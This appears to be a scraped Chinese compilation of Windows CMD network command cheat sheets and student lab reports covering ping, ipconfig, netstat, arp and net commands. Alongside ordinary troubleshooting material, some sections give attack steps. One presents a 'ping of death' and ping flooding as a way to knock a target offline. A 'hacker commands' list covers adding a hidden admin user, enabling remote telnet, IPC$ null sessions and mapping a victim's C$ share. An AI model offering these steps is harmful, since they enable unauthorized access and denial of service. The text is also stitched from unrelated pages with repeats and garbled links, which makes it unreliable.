CMD（网络命令大全） CMD（网络命令大全） netstat -a 查看开启了哪些端口,常用netstat -an netstat -n 查看端口的网络连接情况，常用netstat -an netstat -v 查看正在进行的工作 netstat -p 协议名例：netstat -p tcqip 查看某协议使用情况（查看tcpip 协议使用情况） netstat -s 查看正在使用的所有协议使用情况 nbtstat -A ip 对方136到139其中一个端口开了的话，就可查看对方最近登陆的用户名（03前的为用户名）-注意：参数-A要大写 tracert -参数 ip(或计算机名) 跟踪路由（数据包），参数：“-w数字”用于设置超时间隔。 ping ip(或域名) 向对方主机发送默认大小为32字节的数据，参数：“-l[空格]数据包大小”；“-n发送数据次数”；“-t”指一直ping。 ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping) ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址，ipconfig可用参数“all”显示全部配置信息 tlist -t 以树行列表显示进程(为系统的附加工具，默认是没有安装的，在安装目录的Supporttools文件夹内) kill -F 进程名加-F参数后强制结束某进程(为系统的附加工具，默认是没有安装的，在安装目录的Supporttools文件夹内) net user 用户名密码add 建立用户 net user guest activeyes 激活guest用户 net user 查看有哪些用户 net user 帐户名查看帐户的属性 net localgroup administrators 用户名 add 把“用户”添加到管理员中使其具有管理员权限,注意：administrator后加s用复数 net start 查看开启了哪些服务 net start 服务名开启服务；(如net start telnet， net start schedule) net stop 服务名停止某服务 net time 目标ip 查看对方时间

常用的网络工具命令解析

如果你玩过路由器的话,就知道路由器里面那些很好玩的命令缩写。 例如,"sh int" 的意思是"show interface"。 现在Windows 2000 也有了类似界面的工具,叫做netsh。 我们在Windows 2000 的cmd shell 下,输入netsh 就出来:netsh> 提示符, 输入int ip 就显示: interface ip> 然后输入dump ,我们就可以看到当前系统的网络配置: # ---------------------------------- # Interface IP Configuration # ---------------------------------- pushd interface ip # Interface IP Configuration for "Local Area Connection" set address name = "Local Area Connection" source = static addr = 192.168.1.168 mask = 255.255.255.0 add address name = "Local Area Connection" addr = 192.1.1.111 mask = 255.255.255.0 set address name = "Local Area Connection" gateway = 192.168.1.100 gwmetric = 1 set dns name = "Local Area Connection" source = static addr = 202.96.209.5 set wins name = "Local Area Connection" source = static addr = none

cmd常用命令大全

windows XP cmd命令大全 一，ping 它是用来检查网络是否通畅或者网络连接速度的命令。作为一个生活在网络上的管理员或者黑客来说，ping命令是第一个必须掌握的DOS命令，它所利用的原理是这样的：网络上的机器都有唯一确定的IP地址，我们给目标IP地址发送一个数据包，对方就要返回一个同样大小的数据包，根据返回的数据包我们可以确定目标主机的存在，可以初步判断目标主机的操作系统等。下面就来看看它的一些常用的操作。先看看帮助吧，在DOS窗口中键入：ping /? 回车，。所示的帮助画面。在此，我们只掌握一些基本的很有用的参数就可以了（下同）。 -t 表示将不间断向目标IP发送数据包，直到我们强迫其停止。试想，如果你使用100M 的宽带接入，而目标IP是56K的小猫，那么要不了多久，目标IP就因为承受不了这么多的数据而掉线，呵呵，一次攻击就这么简单的实现了。 -l 定义发送数据包的大小，默认为32字节，我们利用它可以最大定义到65500字节。结合上面介绍的-t参数一起使用，会有更好的效果哦。 -n 定义向目标IP发送数据包的次数，默认为3次。如果网络速度比较慢，3次对我们来说也浪费了不少时间，因为现在我们的目的仅仅是判断目标IP是否存在，那么就定义为一次吧。 说明一下，如果-t 参数和 -n参数一起使用，ping命令就以放在后面的参数为标准，比如"ping IP -t -n 3"，虽然使用了-t参数，但并不是一直ping下去，而是只ping 3次。另外，ping命令不一定非得ping IP，也可以直接ping主机域名，这样就可以得到主机的IP。 下面我们举个例子来说明一下具体用法。 这里time=2表示从发出数据包到接受到返回数据包所用的时间是2秒，从这里可以判断网络连接速度的大小。从TTL的返回值可以初步判断被ping主机的操作系统，之所以说"初步判断"是因为这个值是可以修改的。这里TTL=32表示操作系统可能是win98。 （小知识：如果TTL=128，则表示目标主机可能是Win2000；如果TTL=250，则目标主机可能是Unix） 至于利用ping命令可以快速查找局域网故障，可以快速搜索最快的QQ服务器，可以对

网络工程师常用网络命令

网络经典命令行 1.最基本，最常用的，测试物理网络的 ping 192.168.0.8 －t ，参数－t是等待用户去中断测试 2.查看DNS、IP、Mac等 A.Win98：winipcfg B.Win2000以上：Ipconfig/all C.NSLOOKUP：如查看河北的DNS C:\>nslookup Default Server: https://www.wendangku.net/doc/cc11050428.html, Address: 202.99.160.68 >server 202.99.41.2 则将DNS改为了41.2 > https://www.wendangku.net/doc/cc11050428.html, Server: https://www.wendangku.net/doc/cc11050428.html, Address: 202.99.160.68 Non-authoritative answer: Name: https://www.wendangku.net/doc/cc11050428.html, Address: 202.99.160.212 3.网络信使（经常有人问的~） Net send 计算机名/IP|* (广播) 传送内容，注意不能跨网段 net stop messenger 停止信使服务，也可以在面板－服务修改 net start messenger 开始信使服务 4.探测对方对方计算机名，所在的组、域及当前用户名（追捕的工作原理）ping －a IP －t ，只显示NetBios名 nbtstat -a 192.168.10.146 比较全的 https://www.wendangku.net/doc/cc11050428.html,stat -a 显示出你的计算机当前所开放的所有端口 netstat -s -e 比较详细的显示你的网络资料，包括TCP、UDP、ICMP 和 IP的统计等 6.探测arp绑定（动态和静态）列表，显示所有连接了我的计算机，显示对方IP和MAC地址 arp -a 7.在代理服务器端 捆绑IP和MAC地址，解决局域网内盗用IP！： ARP －s 192.168.10.59 00 －50－ff－6c－08－75 解除网卡的IP与MAC地址的绑定： arp -d 网卡IP

CMD本机常用命令大全

CMD本机常用命令大全 cleanmgr–打开磁盘清理工具compmgmt.msc－－－计算机管理 conf—-启动netmeeting charmap–－启动字符映射表 calc—-启动计算器 chkdsk.exe–－Chkdsk磁盘检查 cmd.exe–－CMD命令提示符 certmgr.msc–证书管理实用程序 cliconfg–SQL SERVER 客户端网络实用程序Clipbrd–－剪贴板查看器 ciadv.msc–－－索引服务程序 dvdplay–－DVD播放器 diskmgmt.msc－－－磁盘管理实用程序dfrg.msc–磁盘碎片整理程序 devmgmt.msc－－－设备管理器 drwtsn32–－－系统医生 dxdiag–－－检查DirectX信息 dcomcnfg–打开系统组件服务 ddeshare–打开DDE共享设置 explorer–打开资源管理器

eventvwr–事件查看器 eudcedit–造字程序 fsmgmt.msc–－共享文件夹管理器 gpedit.msc–－组策略 iexpress–***工具，系统自带 logoff–注销命令 lusrmgr.msc–本机用户和组 mstsc–远程桌面连接 Msconfig.exe－－－系统配置实用程序 mem.exe–－显示内存使用情况（如果直接运行无效，可以先运行cmd，在命令提示符里输入mem.exe>d:a.txt 即可打开d盘查看a.txt，里面的就是内存使用情况了。当然什么盘什么文件名可自己决定。）mplayer2–简易widnows media player mspaint–－画图板 mplayer2–媒体播放机 magnify–－放大镜实用程序 mmc—-－打开控制台 mobsync–－同步命令 notepad–－打开记事本 net start messenger–开始信使服务 net stop messenger–－停止信使服务 net stop messenger–－停止信使服务

计科13-2 第五组 实验2 网络常用命令使用(学习类别)

宁波工程学院电子与信息工程学院 计算机网络实验实验报告 实验名称实验2 网络常用命令使用 班级计科13-2 组别 5 实验地点逸夫楼511 日期 3.24 一、实验目的： ●使用ipconfig命令查看本机地址、网关地址、DNS服务器地址 ●使用ping命令测试网络（如网关）的连通性 ●使用arp命令查看、修改ARP高速缓存内容 ●使用route命令查看路由表，并解释路由表的主要内容 二、实验内容、要求和环境： （1）任务1：使用ping 命令验证简单TCP/IP 网络的连通性。 ping命令用于验证本地主机计算机或其它网络设备上的TCP/IP 网络层连通性。 使用该命令时，可以用目的IP 地址或限定域名（如https://www.wendangku.net/doc/cc11050428.html,）来测试域名服务(DNS) 功能。本实验只使用IP 地址。 ping操作很简单。源计算机向目的设备发送ICMP 回应请求。目的设备用应答消息做出响应。如果源设备和目的设备之间连接断开，路由器可能会用ICMP 消息做出响应，表示主机未知或目的网络未知。 步骤1：验证本地主机计算机上的TCP/IP 网络层连通性。 C:\> ipconfig Windows IP Configuration Ethernet adapter Local Area Connection: Connection-specific DNS Suffix . : IP Address : 172.16.1.2 Subnet Mask : 255.255.0.0 Default Gateway : 172.16.255.254 C:\> 1. 打开Windows 终端，用ipconfig命令确定该主机计算机的IP 地址。 除IP 地址外，输出的其它内容应该与图示相同。如果缺少信息或显示其它子网掩码和默认网关，请重新配置与此主机计算机设置相符的TCP/IP 设置。 2. 记录本地TCP/IP 网络信息的相关信息。

网络常用命令提示符(cmd)语句

网络常用命令提示符（cmd）语句 1.最基本，最常用的，测试物理网络的 ping 192.168.10.88 －t ，参数－t是等待用户去中断测试 2.查看DNS、IP、Mac等 A.Win98：winipcfg B.Win2000以上：Ipconfig/all C.NSLOOKUP：如查看河北的DNS C:\>nslookup Default Server: https://www.wendangku.net/doc/cc11050428.html, Address: 202.99.160.68 >server 202.99.41.2 则将DNS改为了41.2 > https://www.wendangku.net/doc/cc11050428.html, Server: https://www.wendangku.net/doc/cc11050428.html, Address: 202.99.160.68 Non-authoritative answer: Name: https://www.wendangku.net/doc/cc11050428.html, Address: 202.99.160.212 3.网络信使 Net send 计算机名/IP|* (广播) 传送内容，注意不能跨网段 net stop messenger 停止信使服务，也可以在面板－服务修改 net start messenger 开始信使服务 4.探测对方对方计算机名，所在的组、域及当前用户名 ping －a IP －t ，只显示NetBios名 nbtstat -a 192.168.10.146 比较全的 https://www.wendangku.net/doc/cc11050428.html,stat -a 显示出你的计算机当前所开放的所有端口 netstat -s -e 比较详细的显示你的网络资料，包括TCP、UDP、ICMP 和 IP的统计等

6.探测arp绑定（动态和静态）列表，显示所有连接了我的计算机，显示对方IP和MAC地址 arp -a 7.在代理服务器端 捆绑IP和MAC地址，解决局域网内盗用IP： ARP －s 192.168.10.59 00－50－ff－6c－08－75 解除网卡的IP与MAC地址的绑定： arp -d 网卡IP 8.在网络邻居上隐藏你的计算机 net config server /hidden:yes net config server /hidden:no 则为开启 9.几个net命令 A.显示当前工作组服务器列表 net view，当不带选项使用本命令时，它就会显示当前域或网络上的计算机上的列表。 比如：查看这个IP上的共享资源，就可以 C:\>net view 192.168.10.8 在 192.168.10.8 的共享资源 资源共享名类型用途注释 -------------------------------------- 网站服务 Disk 命令成功完成。 B.查看计算机上的用户帐号列表 net user C.查看网络链接 net use 例如：net use z: \\192.168.10.8\movie 将这个IP的movie共享目录映射为本地的Z盘 D.记录链接 net session 例如： C:\>net session 计算机用户名客户类型打开空闲时间

计算机网络常用命令

网络常用命令 1．Ping 命令 Ping 是个使用频率极高的实用程序，用于确定本地主机是否能与另一台主机交换（发送与接收）数据报。根据返回的信息，你就可以推断TCP/IP 参数是否设置得正确以及运行是否正常。需要注意的是：成功地与另一台主机进行一次或两次数据报交换并不表示TCP/IP 配置就是正确的，你必须执行大量的本地主机与远程主机的数据报交换，才能确信TCP/IP 的正确性。 简单的说，Ping 就是一个测试程序，如果Ping 运行正确，你大体上就可以排除网络访问层、网卡、MODEM 的输入输出线路、电缆和路由器等存在的故障，从而减小了问题的范围。但由于可以自定义所发数据报的大小及无休止的高速发送，Ping 也被某些别有用心的人作为DDOS （拒绝服务攻击）的工具，前段时间Yahoo就是被黑客利用数百台可以高速接入互联网的电脑连续发送大量Ping 数据报而瘫痪的。 按照缺省设置，Windows 上运行的Ping 命令发送 4 个ICMP （网间控制报文协议）回送请求，每个32 字节数据，如果一切正常，你应能得到 4 个回送应答。 Ping 能够以毫秒为单位显示发送回送请求到返回回送应答之间的时间量。如果应答时间短，表示数据报不必通过太多的路由器或网络连接速度比较快。Ping 还能显示TTL （Time To Live 存在时间）值，你可以通过TTL 值推算一下数据包已经通过了多少个路由器：源地点TTL 起始值（就是比返回TTL 略大的一个 2 的乘方数）-返回时TTL 值。例如，返回TTL 值为119，那么可以推算数据报离开源地址的TTL 起始值为128，而源地点到目标地点要通 过9 个路由器网段（128-119）；如果返回TTL 值为246，TTL 起始值就是256，源地点到目标地点要通过9 个路由器网段。 通过Ping 检测网络故障的典型次序 正常情况下，当你使用Ping 命令来查找问题所在或检验网络运行情况时，你需要使用许多Ping 命令，如果所有都运行正确，你就可以相信基本的连通性和配置参数没有问题；如果某些Ping 命令出现运行故障，它也可以指明到何处去查找问题。下面就给出一个典型的检测次序及对应的可能故障：ping 127.0.0.1-- 这个Ping 命令被送到本地计算机的IP 软件，该命令永不退出该计算机。 如果没有做到这一点，就表示TCP/IP 的安装或运行存在某些最基本的问题。 ping 本机IP--这个命令被送到你计算机所配置的IP 地址，你的计算机始终都应该对该 Ping 命令作出应答，如果没有，则表示本地配置或安装存在问题。出现此问题时，局域网用户请断开网络电缆，然后重新发送该命令。如果网线断开后本命令正确，则表示另一台计算机可能配置了相同的IP 地址。 ping 局域网内其他IP--这个命令应该离开你的计算机，经过网卡及网络电缆到达其他计算机， 再返回。收到回送应答表明本地网络中的网卡和载体运行正确。但如果收到0个回送应答，那么表示子网掩码（进行子网分割时，将IP 地址的网络部分与主机部分分开的代码）不正确或网卡配置错误或电缆系统有问题。 ping 网关IP--这个命令如果应答正确，表示局域网中的网关路由器正在运行并能够作出应答。 ping 远程IP--如果收到4 个应答，表示成功的使用了缺省网关。对于拨号上网用户则表示能够成功的访问Internet （但不排除ISP 的DNS 会有问题）。 ping localhost--localhost 是个作系统的网络保留名，它是127.0.0.1 的别名，每太计算机都应该能够将该名字转换成该地址。如果没有做到这一带内，则表示主机文件 （/Windows/host ）中存在问题。 ping https://www.wendangku.net/doc/cc11050428.html,-- 对这个域名执行Pin ... 地址，通常是通过DNS 服务器如果这里出现故障，则表示DNS 服务器的IP 地址配置不正确或DNS 服务器有故障（对于拨号上网用户，某些ISP

黑客常用CMD命令大全

黑客常用CMD命令大全 net user heibai lovechina /add 加一个heibai的用户密码为lovechina net localgroup Administrators heibai /add 把他加入Administrator组 net start telnet 开对方的TELNET服务 net use z:\127.0.0.1c$ 映射对方的C盘 net use \\ip\ipc$ " " /user:" " 建立IPC空链接 net use \\ip\ipc$ "密码" /user:"用户名" 建立IPC非空链接 net use h: \\ip\c$ "密码" /user:"用户名" 直接登陆后映射对方C：到本地为H: net use h: \\ip\c$ 登陆后映射对方C：到本地为H: net use \\ip\ipc$ /del 删除IPC链接 net use h: /del 删除映射对方到本地的为H:的映射 net user 用户名密码/add 建立用户 net user 查看有哪些用户 net user 帐户名查看帐户的属性 net user guest /active:yes 将Guest用户激活 net user guest lovechina 把guest的密码改为lovechina net user 用户名/delete 删掉用户 net user guest/time:m-f,08:00-17:00 表示guest用户登录时间为周一至周五的net user guest/time:m,4am-5pm;t,1pm-3pm;w-f,8:00-17:00 表示guest用户登录时间为周一4:00/17:00,周二13:00/15:00,周三至周五8:00/17:00. net user guest/time:all表示没有时间限制. net user guest/time 表示guest用户永远不能登录. 但是只能限制登陆时间，不是上网时间 net time \\127.0.0.1 得到对方的时间， get c:\index.htm d:\ 上传的文件是INDEX.HTM，它位于C:\下，传到对方D:\ copy index.htm \\127.0.0.1\c$\index.htm 本地C盘下的index.htm复制到 127.0.0.1的C盘 net localgroup administrators 用户名/add 把“用户”添加到管理员中使其具有管理员权限,注意：administrator后加s用复数 net start 查看开启了哪些服务 net start 服务名开启服务；(如:net start telnet，net start schedule) net stop 服务名停止某服务 net time \\目标ip 查看对方时间 net time \\目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加参数 /yes可取消确认信息net view 查看本地局域网内开启了哪些共享 net view \\ip 查看对方局域网内开启了哪些共享 net config 显示系统网络设置

网络常用命令

第一部分网络常用命令 一实验内容 熟悉网络常用命令及其工作机制 二实验目的 熟练掌握每个命令的基本功能、命令格式、相关参数说明、使用技巧等 三实验步骤 1. Ping命令 工作机制：用来测试网络连接状态以及信息包发送、接收状态。网络上的机器都有唯一确定的IP地址，按照目标IP地址给对方发送一个数据包，对方要返回一个同样大小 的数据包。根据返回值可以确定目标主机是否存在以及目标主机得操作系统类 型。 相关参数：输入ping /?后ping命令的相关参数都会出现，如下图所示。 Ping -t 表示将不间断向目标IP发送数据包，直到被用户以Ctrl+C中断。主要用

于网络调试，可以判断网络是否畅通。 向目的IP发送了4个数据报，并收到4个数据报，表明网络畅通。 ping –n 连续ping n个包。按照缺省设置，Windows上运行的Ping命令发送4个ICMP （网间控制报文协议）回送请求，每个32字节数据，如果一切正常，你应能得到4个回送应答。 如上图所示，收到4个数据报，每个为32字节，有效时间均为55.并统计了发送和接收的个数，最大时间，最小时间，平均时间。

设置n的大小，向目标地址发送5个数据报并收到5个，并统计各种信息。 Ping –i ttl设置有效期。 已知本地主机到119.75.218.45的TTL为55，设置TTL为4时，显示TTLexpired in transit 表明在传播途中期满。

设置TTL为56时，可正常到达并且默认状态下发送并接收4个数据报。 2.ipconfig命令 工作机制：获得主机配置信息，包括 IP 地址、子网掩码和默认网关。该诊断命令显示所有当前的 TCP/IP 网络配置值，刷新动态主机配置协议（DHCP）和域名 系统（DNS）设置。 相关参数：输入ipconfig /?后显示其所有参数。如下图所示： Ipconfig /all 用于显示本地主机的所有配置信息。

几种CMD网络命令

网络命令可以分为三类：网络监测（如ping）,网络连接（如telnet）,网络配置（如netsh）。 关于网络监测的命令： 一。ping 这个命令是常用的并且是效果最好的网络监测命令。 例： C:\>ping 61.129.45.177 Pinging 61.129.45.177 with 32 bytes of data: (程序默认每个数据包的大小为32字节) Reply from 61.129.45.177: bytes=32 time=15ms TTL=57 (表示目标IP已被拼通,延时为15毫秒) Reply from 61.129.45.177: bytes=32 time=15ms TTL=57 Ping statistics for 61.129.45.177: Packets: Sent = 2, Received =2, Lost = 0 (0% loss) (拼测结果统计, 发出2个,对方收到2个,丢包率为0) Approximate round trip times in milli-seconds: Minimum = 15ms, Maximum = 15ms, Average = 15ms 从以上结果可以看出,此次目标IP地址已被拼通,并且延时只有15ms,网络正常. 如果没有拼通,则会显示以下内容 C:\>ping 61.129.45.177 Pinging 61.129.45.177 with 32 bytes of data: Request timed out. (没有拼通对端主机,本结果表示丢包) Reply from 61.129.45.177: bytes=32 time=200ms TTL=57 Ping statistics for 61.129.45.177: Packets: Sent = 2, Received =1, Lost = 1 (50% loss) Approximate round trip times in milli-seconds: Minimum = 200ms, Maximum = 200ms, Average = 200ms 根据延时大小和丢包率就可以判断网络质量. 线路老化,流量饱和,经过的路由器数量是影响以上参数的最直接的原因.

常用的网络测试命令

常用的网络测试命令 在进行各类网络实验和网络故障排除时，经常需要用到相应的测试工具。网络测试工具基本上分为两类：专用测试工具和系统集成的测试命令，其中，专用测试工具虽然功能强大， 但价格较为昂贵，主要用于对网络的专业测试。对于网络实验和平时的网络维护来说，通过熟练掌握由系统（操作系统和网络设备）集成的一些测试命令，就可以判断网络的工作状态和常见的网络故障。我们以 Windows XP 为例，介绍一些常见命令的使用方法。 1 Ping网络连通测试命令 1.1 Ping 命令的功能 Ping 是网络连通测试命令，是一种常见的网络工具。用这种工具可以测试端到端的连 通性，即检查源端到目的端网络是否通畅。该命令主要是用来检查路由是否能够到达，Ping 的原理很简单，就是通过向计算机发送Internet控制信息协议（ICMP ）从源端向目的端发 出一定数量的网络包，然后从目的端返回这些包的响应，以校验与远程计算机或本地计算机 的连接情况。对于每个发送网络包，Ping 最多等待 1 秒并显示发送和接收网络包的数量， 比较每个接收网络包和发送网络包，以校验其有效性。默认情况下，发送四个回应网络包。 由于该命令的包长非常小，所以在网上传递的速度非常快，可以快速的检测要去的站点是否可达，如果在一定的时间内收到响应，则程序返回从包发出到收到的时间间隔，这样根据时间间隔就可以统计网络的延迟。如果网络包的响应在一定时间间隔内没有收到，则程序认为包丢失，返回请求超时的结果。这样如果让Ping 一次发一定数量的包，然后检查收到相应 的包的数量，则可统计出端到端网络的丢包率，而丢包率是检验网络质量的重要参数。 一般在去某一站点是可以先运行一下该命令看看该站点是否可达。如果执行Ping不成功，则可以预测故障出现在以下几个方面： 网线是否连通 网络适配器配置是否正确 IP 地址是否可用 如果执行Ping 成功而网络仍无法使用，那么问题很可能出在网络系统的软件配置方面，Ping 成功只能保证当前主机与目的主机间存在一条连通的物理路径。它的使用格式是在命 令提示符下键入： ping IP 地址或主机名，执行结果显示响应时间，重复执行这个命令，可以 发现 Ping 报告的响应时间是不同的。 如果网络管理员和用户的Ping 命令都失败了， Ping 命令显示的出错信息是很有帮助的， 可以指导进行下一步的测试计划。这时可注意 Ping 命令显示的出错信息，这种出错信息通常分 为三种情况： (1) unknown host（不知名主机），该远程主机的名字不能被DNS（域名服务器）转换成ip 地址。网络故障可能为 DNS 有故障，或者其名字不正确，或者网络管理员的系统与远程 主机之间的通信线路有故障。 (2)network unreachable （网络不能到达），这是本地系统没有到达远程系统的路由，可 用 netstat-rn 检查路由表来确定路由配置情况。

CMD常用命令大全(最新整理)

说起cmd大家都很熟悉吧很有用哦这里我为大家接扫常见的命令 dos命令[只列出我们工作中可能要用到的] cd\ '返回到根目录 cd.. '返回到上一级目录 1、cd 显示当前目录名或改变当前目录。 2、dir 显示目录中的文件和子目录列表。 3、md 创建目录。 4、del 删除一或数个文件。 5、chkdsk 检查磁盘并显示状态报告。 6、cacls 显示或者修改文件的访问控制表(ACL) 7、copy 将一份或多份文件复制到另一个位置。 8、date 修改日期 9、format 格式化磁盘 10、type 显示文本文件的内容。 11、move 移动文件并重命名文件和目录。 12、expand 展开一个或多个压缩文件。 13、ren 重命名文件。 14、attrib 显示或更改文件属性。 15、time 显示或设置系统时间。 16、at at命令安排在特定日期和时间运行命令和程序。要使用AT 命令，计划服务必须已在运行中。 17、net [user],[time],[use] 多，自己去查 18、netstat 显示协议统计和当前tcp/ip连接 19、nbtstat 基于NBT（net bios over tcp/ip）的协议统计和当前tcp/ip连接 20、route 操作和查看网络路由表 21、ping 就不说了，大家都熟悉吧 22、nslookup 域名查找 23、edit 命令行下的文本编辑器 24、netsh强大的命令行下修改tcp/ip配置的工具 25、fdisk 相信现在用的人比较少了，不过在没有其他工具的情况，他还是有用的 更多： attrib 设置文件属性 ctty 改变控制设备 defrag 磁盘碎片整理 doskey 调用和建立DOS宏命令 debug 程序调试命令

常用的9个网络命令

实验：网络常见的9个命令 1．ping命令 ping是个使用频率极高的实用程序，主要用于确定网络的连通性。这对确定网络是否正确连接，以及网络连接的状况十分有用。简单的说，ping就是一个测试程序，如果ping 运行正确，大体上就可以排除网络访问层、网卡、Modem的输入输出线路、电缆和路由器等存在的故障，从而缩小问题的范围。 ping能够以毫秒为单位显示发送请求到返回应答之间的时间量。如果应答时间短，表示数据报不必通过太多的路由器或网络，连接速度比较快。ping还能显示TTL（Time To Live，生存时间）值，通过TTL值可以推算数据包通过了多少个路由器。 (1) 命令格式 ping 主机名 ping 域名 ping IP地址 如图所示，使用ping命令检查到IP地址210.43.16.17的计算机的连通性，该例为连接正常。共发送了四个测试数据包，正确接收到四个数据包。 (2) ping命令的基本应用 一般情况下，用户可以通过使用一系列ping命令来查找问题出在什么地方，或检验网络运行的情况。 下面就给出一个典型的检测次序及对应的可能故障： ①ping 127.0.0.1 如果测试成功，表明网卡、TCP/IP协议的安装、IP地址、子网掩码的设置正常。如果测试不成功，就表示TCP/IP的安装或设置存在有问题。 ②ping 本机IP地址 如果测试不成功，则表示本地配置或安装存在问题，应当对网络设备和通讯介质进行测试、检查并排除。 ③ping局域网内其他IP

如果测试成功，表明本地网络中的网卡和载体运行正确。但如果收到0个回送应答，那么表示子网掩码不正确或网卡配置错误或电缆系统有问题。 ④ping 网关IP 这个命令如果应答正确，表示局域网中的网关路由器正在运行并能够做出应答。 ⑤ping 远程IP 如果收到正确应答，表示成功的使用了缺省网关。对于拨号上网用户则表示能够成功的访问Internet（但不排除ISP的DNS会有问题）。 ⑥ping localhost local host是系统的网络保留名，它是127.0.0.1的别名，每台计算机都应该能够将该名字转换成该地址。否则，则表示主机文件（/Windows/host）中存在问题。 ⑦ping （一个著名网站域名） 对此域名执行Ping命令，计算机必须先将域名转换成IP地址，通常是通过DNS服务器。如果这里出现故障，则表示本机DNS服务器的IP地址配置不正确，或它所访问的DNS 服务器有故障 如果上面所列出的所有ping命令都能正常运行，那么计算机进行本地和远程通信基本上就没有问题了。但是，这些命令的成功并不表示你所有的网络配置都没有问题，例如，某些子网掩码错误就可能无法用这些方法检测到。 （3）ping命令的常用参数选项 ping IP -t：连续对IP地址执行ping命令，直到被用户以Ctrl+C中断。 ping IP -l 2000：指定ping命令中的特定数据长度（此处为2000字节），而不是缺省的32字节。 ping IP -n 20：执行特定次数（此处是20）的ping命令。 注意：随着防火墙功能在网络中的广泛使用，当你ping其他主机或其他主机ping你的主机时，而显示主机不可达的时候，不要草率地下结论。最好与对某台“设置良好”主机的ping结果进行对比。 2. ipconfig命令 ipconfig实用程序可用于显示当前的TCP/IP配置的设置值。这些信息一般用来检验人工配置的TCP/IP设置是否正确。 而且，如果计算机和所在的局域网使用了动态主机配置协议DHCP，使用ipconfig命令可以了解到你的计算机是否成功地租用到了一个IP地址，如果已经租用到，则可以了解它目前得到的是什么地址，包括IP地址、子网掩码和缺省网关等网络配置信息。 下面给出最常用的选项： (1)ipconfig：当使用不带任何参数选项ipconfig命令时，显示每个已经配置了的接口的IP地址、子网掩码和缺省网关值。 (2)ipconfig /all：当使用all选项时，ipconfig能为DNS和WINS服务器显示它已配置且所有使用的附加信息，并且能够显示内置于本地网卡中的物理地址（MAC）。如果IP地址是从DHCP服务器租用的，ipconfig将显示DHCP服务器分配的IP地址和租用地址预计失效的日期。图为运行ipconfig /all命令的结果窗口。

常见的9个网络命令详解(图)

实验：常见的9个网络命令 1．ping命令 ping是个使用频率极高的实用程序，主要用于确定网络的连通性。这对确定网络是否正确连接，以及网络连接的状况十分有用。简单的说，ping就是一个测试程序，如果ping 运行正确，大体上就可以排除网络访问层、网卡、Modem的输入输出线路、电缆和路由器等存在的故障，从而缩小问题的范围。 ping能够以毫秒为单位显示发送请求到返回应答之间的时间量。如果应答时间短，表示数据报不必通过太多的路由器或网络，连接速度比较快。ping还能显示TTL（Time To Live，生存时间）值，通过TTL值可以推算数据包通过了多少个路由器。 (1) 命令格式 ping 主机名 ping 域名 ping IP地址 如图所示，使用ping命令检查到IP地址210.43.16.17的计算机的连通性，该例为连接正常。共发送了四个测试数据包，正确接收到四个数据包。 (2) ping命令的基本应用 一般情况下，用户可以通过使用一系列ping命令来查找问题出在什么地方，或检验网

络运行的情况。 下面就给出一个典型的检测次序及对应的可能故障： ① ping 127.0.0.1 如果测试成功，表明网卡、TCP/IP协议的安装、IP地址、子网掩码的设置正常。如果测试不成功，就表示TCP/IP的安装或设置存在有问题。 ② ping 本机IP地址 如果测试不成功，则表示本地配置或安装存在问题，应当对网络设备和通讯介质进行测试、检查并排除。 ③ ping局域网内其他IP 如果测试成功，表明本地网络中的网卡和载体运行正确。但如果收到0个回送应答，那么表示子网掩码不正确或网卡配置错误或电缆系统有问题。 ④ ping 网关IP 这个命令如果应答正确，表示局域网中的网关路由器正在运行并能够做出应答。 ⑤ ping 远程IP 如果收到正确应答，表示成功的使用了缺省网关。对于拨号上网用户则表示能够成功的访问Internet（但不排除ISP的DNS会有问题）。 ⑥ ping localhost local host是系统的网络保留名，它是127.0.0.1的别名，每台计算机都应该能够将该名字转换成该地址。否则，则表示主机文件（/Windows/host）中存在问题。 ⑦ ping https://www.wendangku.net/doc/cc11050428.html,（一个著名网站域名） 对此域名执行Ping命令，计算机必须先将域名转换成IP地址，通常是通过DNS服务器。如果这里出现故障，则表示本机DNS服务器的IP地址配置不正确，或它所访问的DNS服务器有故障 如果上面所列出的所有ping命令都能正常运行，那么计算机进行本地和远程通信基本上就没有问题了。但是，这些命令的成功并不表示你所有的网络配置都没有问题，例如，某些子网掩码错误就可能无法用这些方法检测到。 （3）ping命令的常用参数选项 ping IP -t：连续对IP地址执行ping命令，直到被用户以Ctrl+C中断。 ping IP -l 2000：指定ping命令中的特定数据长度（此处为2000字节），而不是缺

常用网络命令-非常实用

常用网络命令-非常实用 很多的弱电朋友在项目中经常会遇到一些网络故障，其实很多的网络故障通过命令是可以检测出来的，通过使用网络命令也会使项目进展事半功倍，那么就让我们一起来了解弱电经常会用到的网络命令。 1、ping命 ping是个使用频率极高的实用程序，主要用于确定网络的连通性。这对确定网络是否正确连接，以及网络连接的状况十分有用。简单的说，ping就是一个测试程序，如果ping运行正确，大体上就可以排除网络访问层、网卡、Modem的输入输出线路、电缆和路由器等存在的故障，从而缩小问题的范围。 ping能够以毫秒为单位显示发送请求到返回应答之间的时间量。如果应答时间短，表示数据报不必通过太多的路由器或网络，连接速度比较快。ping还能显示TTL（Time To Live，生存时间）值，通过TTL值可以推算数据包通过了多少个路由器。 (1)命令格式 ping主机名 ping域名 pingIP地址 如图所示，使用ping命令检查到IP地址210.43.16.17的计算机的连通性，该例为连接正常。共发送了四个测试数据包，正确接收到四个数据包。

(2) ping命令的基本应用 一般情况下，用户可以通过使用一系列ping命令来查找问题出在什么地方，或检验网络运行的情况。 下面就给出一个典型的检测次序及对应的可能故障： ①ping 127.0.0.1 如果测试成功，表明网卡、TCP/IP协议的安装、IP地址、子网掩码的设置正常。如果测试不成功，就表示TCP/IP的安装或设置存在有问题。 ②ping 本机IP地址 如果测试不成功，则表示本地配置或安装存在问题，应当对网络设备和通讯介质进行测试、检查并排除。 ③ping局域网内其他IP 如果测试成功，表明本地网络中的网卡和载体运行正确。但如果收到0个回送应答，那么表示子网掩码不正确或网卡配置错误或电缆系统有问题。 ④ping 网关IP 这个命令如果应答正确，表示局域网中的网关路由器正在运行并能够做出应答。 ⑤ping 远程IP 如果收到正确应答，表示成功的使用了缺省网关。对于拨号上网用户则表示能够成功的访问Internet（但不排除ISP的DNS 会有问题）。

网络测试常用命令

